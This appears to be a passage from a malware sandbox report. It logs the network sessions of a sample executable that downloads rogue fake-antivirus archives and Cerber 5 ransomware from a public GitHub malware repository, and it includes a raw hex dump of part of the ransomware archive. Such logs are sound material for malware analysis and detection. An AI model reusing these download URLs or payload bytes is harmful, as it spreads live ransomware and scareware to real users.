                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:40 UTC16029INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.449802140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:40 UTC16031OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:40 UTC16031INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:02 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:40 UTC16032INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.449804140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:41 UTC16034OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:41 UTC16034INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:20 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:41 UTC16034INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.449807140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:42 UTC16036OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:43 UTC16036INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:43 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:43 UTC16037INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.449809140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:43 UTC16038OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:43 UTC16039INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:09 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:43 UTC16039INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.449712185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:06 UTC515OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:06 UTC515INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 185620
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:06 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6921-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455506.098190,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 797cafeb915577df81b387769fd601e1986d6398
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:06 GMT
                                                                                                        Source-Age: 198
                                                                                                        2022-09-29 12:45:06 UTC516INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 9c f5 4a 57 39 9c 5a 62 d4 02 00 f8 e4 04 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 43 65 72 62 65 72 35 2e 65 78 65 b3 65 c3 dc f7 40 a4 56 9a af 6a f2 79 cc 2c 79 59 8b af 8c 38 0a 8c 54 10 a7 df ac af 7a 8c 29 fd c4 6e 49 ec 85 d0 b3 ed 8c 20 81 e7 7f fc 7e 72 5c 18 04 0c 93 d2 8e 0f 2e 35 72 7c 8b 97 fc cb 24 10 a0 1e 13 7d 3c 96 80 f9 8a 0c b4 3d 06 97 40 f1 3a 8d c7 b9 1b 60 0c f7 bf c0 c3 dd 3a d6 b5 b1 77 61 f3 44 af 99 7d d7 9a a9 2d 28 38 5c ec bf 85 4f c7 26 7e 99 af ed 48 bf 1f 7e 53 e2 4f 1c 29 93 32 9a 5f d5 7d 8c 9a 1a 45 92 80 a5 6e 26 4a 14 9b 3f f3 10 df ac c9 3b b1 17 e9 99 1c 76 2b 9c f7 83 4d fd bb 4e f3 b4 73 91 2f 63 d7 27 41 25 cc 91 4f 9b 5e 70 c2 ec 61 ad c0 c3 ea e5 8d 28 2b 1d 29 ae f4 f8
                                                                                                        Data Ascii: PKJW9ZbEndermanch@Cerber5.exee@Vjy,yY8Tz)nI ~r\.5r|$}<=@:`:waD}-(8\O&~H~SO)2_}En&J?;v+MNs/c'A%O^pa(+)
                                                                                                        2022-09-29 12:45:06 UTC532INData Raw: ae 88 9a bb 4e 64 0a 40 e9 63 5b 70 4d 14 2b f4 09 30 91 ee b9 1f e8 a5 9b d3 10 70 cf ce 91 d4 fd 05 25 32 49 91 91 62 96 9d 44 56 17 ce 24 76 c0 51 35 7b b5 30 ff 62 32 08 88 3e 6d 17 6f 75 c3 50 77 6d 75 3c 66 c0 75 fc 4d 5d 90 40 ca 09 31 4b a9 85 6c e0 3a 59 46 dd 25 27 69 77 5a 4c 96 8e c0 2a b7 7a b3 ae ef cd 3d d6 7e ce ac a4 8f c0 d5 73 15 03 72 23 09 0a 14 4a a5 ca cb eb 15 c2 dc 2a 53 78 da 66 fb 14 01 3b f1 27 3d 9d a1 b7 f2 78 44 ef 93 76 27 77 d7 82 64 8d b6 ab 3c 16 3f 79 b4 47 9f 9c 0d 4f f3 dd d8 16 36 e5 a1 b9 c3 ea 21 7d 8e 3d 85 43 e5 64 10 d9 cc 4c 54 a4 63 e4 83 3c 9d df 75 5e 90 03 d4 36 c7 c6 4b d1 b8 8c c2 76 2a 28 ab a6 ef c6 60 f0 e5 0d c9 41 fb b0 18 52 7b c1 ff 56 c9 a4 30 ad 89 43 15 dc b8 48 9e 8f 91 60 f1 59 85 c6 20 be c6
                                                                                                        Data Ascii: Nd@c[pM+0p%2IbDV$vQ5{0b2>mouPwmu<fuM]@1Kl:YF%'iwZL*z=~sr#J*Sxf;'=xDv'wd<?yGO6!}=CdLTc<u^6Kv*(`AR{V0CH`Y
                                                                                                        2022-09-29 12:45:06 UTC548INData Raw: 1e 28 da ab d9 c9 dc ab 2b eb 07 f3 05 c0 a5 c1 92 14 76 cd ab 39 d5 ce 11 b9 b4 81 78 0c d2 91 d8 cd b6 65 b9 80 3b 2b b0 f2 6c 0f 69 87 c6 fe 58 2c de dc 4d 59 ad f6 d4 a1 ad 03 c7 5a f5 1f 7a 6f 24 50 bb 54 d0 f6 ba 5e 40 57 3d 7b 2c f6 5d fb 96 43 77 f2 69 7e 9a 71 95 81 10 40 88 af ed d1 5e 7a e6 44 eb ce c4 fc d9 1d 05 04 10 4f 65 1c c7 ac 65 4b 3e 6e 9c 59 cd b4 4c 01 ce 90 07 be 80 a8 1d 11 73 2d c0 4e 93 1d fe 75 68 85 6d 08 56 75 fa 22 12 e1 8f c5 58 05 52 af 73 1e 8f c3 2d 7f e9 9f b1 43 d1 e4 f1 39 e6 4a c7 95 80 fc 2f c8 41 45 56 7f ca e6 74 79 0d 5a b8 b8 d1 74 0b 8e 9a dc 0a cc 18 af 0f 7f 68 41 8d c6 6e 61 3f 46 df f8 32 90 0e f9 63 6b c3 3b 42 e8 77 c6 55 2b a4 d5 3c da 9a dc 8f c1 d4 8c 17 4a 0e 17 91 fb 27 8a 99 0e f1 b7 b7 ad 57 67 77
                                                                                                        Data Ascii: (+v9xe;+liX,MYZzo$PT^@W={,]Cwi~q@^zDOeeK>nYLs-NuhmVu"XRs-C9J/AEVtyZthAna?F2ck;BwU+<J'Wgw
                                                                                                        2022-09-29 12:45:06 UTC564INData Raw: d7 ef cd a6 4d 0d fb 49 c7 e2 d3 a7 ce 85 87 d9 fe bf 2d 91 8e b2 47 c6 0f fd 1a 6c 3b 30 98 8f fe ac 49 c0 e1 3b 34 10 53 a8 d1 e2 63 b7 55 c0 5f 1d c8 b4 dc 8b b0 f8 40 bf 45 89 15 77 3a a6 7a fe 13 2c 9f 09 46 b4 dc be f9 38 bd ba 5a ea 32 ce 6f dc 18 6a a0 b9 f6 59 c4 ac 8d fa 89 09 fd 52 b8 4a 8a 8c 62 76 be ae 7b 4c 7e 60 ee f1 28 37 a2 ee da dc 91 78 65 37 49 c5 0a e2 3a 27 1e 54 96 31 67 8d 0f 88 ec 45 87 be 65 47 39 61 dc 96 f2 ed ac 55 e2 37 e4 d5 aa f0 8f a2 6b 61 37 6a 75 22 50 6e 92 ce 26 bb 5b ce d7 fa 5b 7b d1 6d b0 a7 0d 40 f9 14 4a de 56 6d 84 4f c2 6c 61 65 22 ee 22 bd 38 55 e4 22 b6 d1 46 c6 e6 72 ac eb 36 28 c5 28 dc 36 44 98 78 2f da 18 56 d2 eb 39 4b f2 28 ab 59 19 48 b2 2f 58 f4 2b 7f 51 d7 4e 88 46 d6 da 38 06 a1 d2 74 19 43 a7 62
                                                                                                        Data Ascii: MI-Gl;0I;4ScU_@Ew:z,F8Z2ojYRJbv{L~`(7xe7I:'T1gEeG9aU7ka7ju"Pn&[[{m@JVmOlae""8U"Fr6((6Dx/V9K(YH/X+QNF8tCb
                                                                                                        2022-09-29 12:45:06 UTC580INData Raw: 73 d2 fc 41 ed b5 ab 41 58 95 cf 43 35 8e 03 0e 8a ff 40 12 34 88 23 01 9a 63 71 7e 76 4e 8e dd 5d cc 86 30 93 cb f3 5a 62 2a d3 77 c8 bf 56 42 24 bd 20 53 9e 7e 39 65 10 27 f3 82 70 b8 35 64 5c f8 d9 fa 02 d4 25 ad db 19 f5 6e 9f 2b 61 1e 63 b9 4a 6b f8 a1 2f e5 d5 95 fc 1f b0 87 e5 d0 6f af 05 b7 d9 f3 b5 47 2f ca 0c 0a 99 72 e6 4a 05 53 1d 9c c2 48 82 a4 18 1c 91 21 1e 26 7e 16 14 04 64 cb 48 a3 61 48 cc b1 26 08 02 b4 9b 45 df 31 8c 02 c2 80 7f b5 ca 8b 31 d1 db 1c f5 e1 4f 1e b2 78 86 65 af 4b 37 c4 b5 ba 36 3f c8 06 dd c4 0a 4b b6 f0 24 83 9b af a1 c7 aa c8 13 f2 98 a0 ca 73 1b d0 28 cf f6 e2 e4 4d 20 55 63 af a9 6d e3 6b c9 20 b5 98 4b 8f bc bf 9e ce cf d4 2d 2a 47 28 8b 23 14 14 2b 84 dc c9 30 34 54 f9 25 b5 95 71 b4 47 f9 a9 ad 15 1a 33 4f 0a f4
                                                                                                        Data Ascii: sAAXC5@4#cq~vN]0Zb*wVB$ S~9e'p5d\%n+acJk/oG/rJSH!&~dHaH&E11OxeK76?K$s(M Ucmk K-*G(#+04T%qG3O
                                                                                                        2022-09-29 12:45:06 UTC596INData Raw: 34 f0 2d 6d 16 93 6a a8 86 2a 58 27 f5 b0 a2 75 3d 3e 7c 7b 29 13 b1 9e 1e 00 82 ac fe d3 ce 95 b2 03 ad 7b 3b f0 a5 b5 40 87 6b 44 2e 2c 9f 3d a5 23 28 5a ed 57 35 1c ce a8 ae 49 21 14 c8 b6 06 95 09 7f 2f 45 77 69 cf 96 ba b0 57 04 83 94 c5 6b e6 2c 38 04 b0 2e eb 97 1f 19 28 e0 4b c2 9b 47 9f be 24 2f e9 72 53 39 9f ba 2b 13 35 26 a4 b2 a1 71 50 ea d7 44 ca 39 38 49 c8 7a b0 9b 6f 07 4a e1 7f ff 56 6a c9 0d 78 40 80 d0 a9 7f 2b 18 21 ae 44 91 a0 ab 92 33 81 e4 8b ff 91 0e 31 3a 21 d7 cb 19 48 81 50 81 e1 87 78 8f 20 64 06 65 15 74 d0 51 f8 1f db 56 77 2d b4 26 cb ce c0 f3 92 3a 33 b8 5f 69 49 03 55 94 6d cd cd 9b 0a f6 b0 1f 8d 1a 74 60 5c 24 33 1f e1 11 d5 8d 78 ed 5f 33 db 55 b4 5a 29 92 91 b7 63 65 fa 6e 52 2e 9a 4a bf d0 f9 ef d6 7a eb 7e b5 00 97
                                                                                                        Data Ascii: 4-mj*X'u=>|{){;@kD.,=#(ZW5I!/EwiWk,8.(KG$/rS9+5&qPD98IzoJVjx@+!D31:!HPx detQVw-&:3_iIUmt`\$3x_3UZ)cenR.Jz~
                                                                                                        2022-09-29 12:45:06 UTC612INData Raw: 2d 67 2b 7a 35 f6 39 84 36 e6 31 95 75 06 16 70 d5 45 a3 39 c6 54 aa 60 18 de b4 b3 f3 92 f5 ed 19 47 e8 59 fc 0e a9 ba 5a 6e 6e 98 e9 7a 9f d6 f0 62 74 4d 8f 19 7a a8 8d bf cd ca 1f 7d 12 35 6a 8b 06 8a 53 6c ac 6d 6d 9a 7c 30 70 8e b7 89 8a ed 82 dc 45 95 97 d0 75 f3 ad 68 cf 21 67 a4 ad f3 ee e8 53 94 3b 51 18 18 f7 a0 63 80 f9 be 98 33 ef 1b 85 12 a7 86 46 13 72 53 99 0a 77 e3 df 2c 08 bd aa 6e 0e b9 9b 13 58 23 3f 52 ae ed e9 56 53 af d0 c5 23 70 b6 fb 8e 97 65 87 c4 05 f2 4c ed 07 64 56 e1 cc 53 47 e6 7f 7c b5 68 bc ef 45 03 bd f3 e3 df d3 f6 95 0a 2b 87 68 15 e6 64 48 ad 53 60 de e9 59 53 cd 08 c1 19 52 f1 4d f8 3c 08 6b a1 7e 16 b7 33 fb 5d 0e 9f fe 80 df 4d cf f9 6d ae b0 71 6c ae b6 4d dc ac 67 df 6c 7b ed 71 f4 d5 52 ff 09 60 02 bc e9 60 a7 71
                                                                                                        Data Ascii: -g+z5961upE9T`GYZnnzbtMz}5jSlmm|0pEuh!gS;Qc3FrSw,nX#?RVS#peLdVSG|hE+hdHS`YSRM<k~3]MmqlMgl{qR``q
                                                                                                        2022-09-29 12:45:06 UTC628INData Raw: 55 80 87 71 a1 71 15 5d ec 72 a4 aa 70 80 94 33 e3 88 c9 82 30 4b 70 dd 66 d0 bc 94 59 f5 6d c7 1a c3 51 26 62 cb 0b a3 20 62 7d 1d 6b 43 c7 d4 74 ee 56 26 25 c8 d3 01 c3 74 e8 7d bd c0 1c 4b 66 a6 0e 3e 83 df 2e 36 85 4d 46 ad dc e8 55 52 62 cf 73 a1 65 29 9c 13 92 f0 84 9e 8a c2 90 83 56 b6 28 9b cd 63 31 18 cf ee 75 19 16 e9 58 fb 78 26 5f 6f 19 cc d8 ae 50 44 9c 7d 97 23 bb fb 72 e9 e9 44 14 aa 19 42 ec 33 ea 7c 51 35 49 65 32 f6 e4 e9 28 1c 82 d3 24 aa d0 dd dc 9b 05 48 ec 94 67 1d 3a 52 58 b1 99 c4 9f 93 a7 17 02 26 d6 35 fb 9d c7 80 a5 4c f4 5a 9e 1e d9 f6 b1 f9 6f 2c a4 e8 57 f5 18 9b 4f e8 1c 8e 29 ec 5f 76 a6 c2 36 29 b1 56 f6 f8 54 a4 cb 17 de 73 99 a2 26 7a bd 49 0a 64 16 39 60 ef 2e 64 2b 45 84 2d b0 7e 9d 66 fa 43 f9 6c bc cc 5f 93 af 3f 1e
                                                                                                        Data Ascii: Uqq]rp30KpfYmQ&b b}kCtV&%t}Kf>.6MFURbse)V(c1uXx&_oPD}#rDB3|Q5Ie2($Hg:RX&5LZo,WO)_v6)VTs&zId9`.d+E-~fCl_?
                                                                                                        2022-09-29 12:45:06 UTC644INData Raw: 89 84 13 85 a1 7b 72 38 0d 79 82 1f 21 ab 93 76 8b 71 80 0f 61 27 4e 5f 2a bb 03 85 07 01 97 8e c3 c3 b5 f1 d5 fa 28 58 7f 74 21 c8 8e 4f 36 90 bd eb c5 1b 6d fd 81 f1 ba 53 c2 a4 a5 b8 4e 9f 6f 10 3d 11 e4 37 1c 06 ba d4 ac e3 f0 1e 4e 07 e9 57 02 43 b6 db 5e 07 9c 6b cf 5f 26 a6 dd 3c ff c6 dc 03 d7 e4 a8 ee 70 4e 3a 5c 03 e4 5b 1c 63 1c a2 38 28 12 10 66 2b a0 61 96 fe 41 0b e5 04 99 26 8e 93 ca 08 ff 55 89 35 03 49 34 22 74 ac 8c 88 63 12 b3 24 b6 9b d6 99 6f 16 8c 8e 74 0c d7 bf 4d 82 16 90 54 6b 6d 7b 67 c4 f3 89 33 9c e7 f8 d6 2c 55 3a 36 3a 11 ed 40 c0 4b 9c c3 40 80 1a df 01 38 6b 6d f9 a0 a0 75 4e 2e 40 52 2c ae e5 89 bd 47 05 0b c3 49 c3 91 41 30 16 0e d4 1a ef 35 cf a7 f4 7e 56 39 a5 33 34 34 96 f4 02 8d 92 77 7b 54 b6 a4 99 ce 06 cd 06 9a ae
                                                                                                        Data Ascii: {r8y!vqa'N_*(Xt!O6mSNo=7NWC^k_&<pN:\[c8(f+aA&U5I4"tc$otMTkm{g3,U:6:@K@8kmuN.@R,GIA05~V9344w{T
                                                                                                        2022-09-29 12:45:06 UTC660INData Raw: 3b 08 84 e1 6b c4 3e 5f 67 fe 11 be bd 29 a3 f0 eb 61 80 83 b5 a4 a6 43 c4 89 97 7b 87 02 6b b5 a8 ae 69 72 04 9a 2a 63 c7 e2 2f 1a 6f 40 60 14 08 1f c1 98 ba 0c 4d 8e df e0 19 94 8f c6 ba df 31 6e d1 a6 25 8d 21 5b 38 39 6b 11 6b f8 4f b3 4a 01 10 3a b7 a5 32 92 d5 42 75 dc 98 54 a2 e7 02 c8 91 56 38 59 c0 35 cb 5a 34 0d 17 a7 ff f7 bf 22 94 49 b4 b1 0b e9 5c d8 2d 20 8f b2 58 45 5c 71 7d 4b 39 26 7e 06 24 05 19 1a 3b a5 cc ec 66 61 43 76 2a 71 00 8d f6 f5 f6 f6 4c a9 e3 63 01 75 43 9c e7 14 14 2e 18 e7 ac 9c be f3 cc 4e 13 4b ab 6b b0 19 bc bb 33 d4 e4 f5 b3 81 d4 5e ee cb 1b c7 da 47 33 d5 06 ff ba b3 d1 49 69 bb 27 d2 85 de ce 1a bd 99 20 63 78 6b ac 38 64 ae f3 54 5b f7 e4 da d4 c4 25 3d 83 d8 14 11 75 48 21 03 5b ae 62 33 49 51 24 31 97 dc 0a fb cf
